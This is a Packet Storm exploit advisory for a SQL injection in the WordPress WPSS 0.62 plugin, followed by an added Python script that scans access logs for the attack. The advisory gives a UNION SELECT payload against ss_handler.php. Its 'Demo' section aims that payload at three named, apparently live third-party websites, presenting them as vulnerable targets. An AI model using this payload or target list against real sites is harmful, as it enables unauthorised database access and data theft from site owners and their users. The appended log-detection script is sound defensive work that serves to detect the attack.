WordPress WPSS 0.62 SQL Injection

2014-08-06T00:00:00
ID PACKETSTORM:127771
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2014-08-06T00:00:00

Description

                                        
                                            `|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
|-------------------------------------------------------------------------|  
| [*] Exploit Title: WordPress WPSS V 0.62 Plugin SQL Injection  
|  
| [*] Exploit Author: Ashiyane Digital Security Team  
|  
| [*] Date : 2014-08-05  
|  
| [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71  
|  
| [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip  
|  
| [*] Version : 0.62  
|  
| [*] Tested on: Windows, Mozilla Firefox  
|-------------------------------------------------------------------------|  
| [*] PoC :  
|  
| [*]   
[Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
|-------------------------------------------------------------------------|  
| [*] Demo:  
|  
| [*]   
http://www.tahoebusinesses.com//wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
| [*]   
http://www.forzabykemp.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
| [*]   
http://calgarysalesteam.com/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#  
|  
|-------------------------------------------------------------------------|  
| [*]Discovered By : ACC3SS  
|-------------------------------------------------------------------------|  
|-------------------------------------------------------------------------|  
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
`
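
Added example, not part of the original advisory: a log check for the request pattern shown in the PoC. It flags requests to ss_handler.php whose ss_id parameter is not a plain integer; the combined access-log format, the integer-only rule for legitimate ss_id values, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Plugin path and parameter name are taken from the advisory's PoC.
HANDLER = "/wp-content/plugins/wpss/ss_handler.php"
PARAM = "ss_id"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate ss_id is a short, non-negative integer.
VALID_ID = re.compile(r"\d{1,10}")

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2014:10:00:01 +0000] "GET /wp-content/plugins/wpSS/'
    'ss_handler.php?ss_id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Aug/2014:10:00:05 +0000] "GET /wordpress//wp-content/'
    'plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4 '
    'HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Aug/2014:10:00:09 +0000] "GET /index.php?ss_id=abc '
    'HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

def suspicious_ss_id(log_line):
    """Return the decoded ss_id if the line is a request to ss_handler.php
    whose ss_id is not a plain integer; otherwise return None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    # Decode, collapse repeated slashes and lowercase so that variants such
    # as "//wp-content/plugins/wpSS/" still match the handler path.
    path = re.sub(r"/+", "/", unquote(path)).lower()
    if not path.endswith(HANDLER):
        return None
    # parse_qs percent-decodes values; keep_blank_values catches "ss_id=".
    for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
        if not VALID_ID.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_ss_id) for every flagged log line."""
    hits = []
    for line in lines:
        value = suspicious_ss_id(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-integer ss_id: {value!r}")
```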